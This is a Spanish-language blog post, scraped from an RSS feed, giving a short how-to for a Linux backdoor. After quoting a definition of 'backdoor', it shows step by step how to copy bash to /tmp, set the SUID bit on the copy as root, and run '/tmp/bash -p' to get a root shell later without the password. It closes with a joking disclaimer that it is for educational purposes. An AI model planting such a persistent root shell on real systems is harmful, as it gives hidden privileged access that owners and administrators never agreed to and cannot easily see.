pagondel » Backdoor http://www.pagondel.org asdf Sat, 05 Nov 2011 04:20:33 +0000 en hourly 1 http://wordpress.org/?v=3.3.1 How To: Backdoor en Linux http://www.pagondel.org/how-to-backdoor-en-linux/ http://www.pagondel.org/how-to-backdoor-en-linux/#comments Wed, 24 Feb 2010 20:22:57 +0000 pagondel http://www.pagondel.org/?p=321

Según Wikipedia un backdoor es:

En la informática, una puerta trasera (o en inglés backdoor), es una secuencia especial dentro del código de programación mediante la cual el programador puede acceder o escapar de un programa en caso de emergencia o contingencia en algún problema.
Estas puertas también pueden ser utilizadas para fines maliciosos y espionaje.
En este caso crearemos una puerta trasera que nos permita logearnos como root sin necesidad de tener la contraseña (aunque requeriremos tener acceso previo a la cuenta de root por lo menos una vez).
Lo primero que haremos será copiar una shell bash a algún otro directorio, en este caso usaremos /tmp:
cp -p /bin/bash /tmp
La opción -p permite copiar manteniendo los permisos/dueño originales del archivo.
Ahora, como root debemos dar el permiso SUID al bash que copiamos:
chmod u+s /tmp/bash
Y finalmente solamente necesitamos ejecutar nuestra copia de la bash:
/tmp/bash -p
La opción -p permite ejecutar bash sin cargar las variables de entorno del usuario que este ejecutandola.
Disclaimer: Este post es solo con propósitos educacionales :P.
]]> http://www.pagondel.org/how-to-backdoor-en-linux/feed/ 3